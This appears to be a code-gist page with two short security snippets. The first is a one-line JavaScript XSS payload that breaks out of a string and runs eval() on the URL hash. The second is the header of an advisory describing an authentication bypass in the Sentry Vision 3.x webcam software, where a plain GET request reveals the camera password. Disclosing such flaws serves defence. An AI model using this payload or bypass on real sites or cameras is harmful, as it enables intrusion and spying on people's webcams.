This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'';var msgbox;if(location.hash){eval(location.hash.slice(1))}else{alert(1)}// msgbox+1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################## | |
#Sentry Vision 3.x Authentication Bypass | |
#Paolo Serracino e Pierluca De Santis | |
#The sentry vision is offered in free download as a security tool for remoting | |
#webcam surveillance. | |
#Authentication is managed on client side. A GET request to the index page | |
#is enough to retrieve the webcam password and to successfully authenticate, | |
#resulting in access to the victim webcam. | |
#Due to the nature of the software, vendor also suggests to use port forwarding | |
#to make the cam reachable (and exploitable) even from WAN. |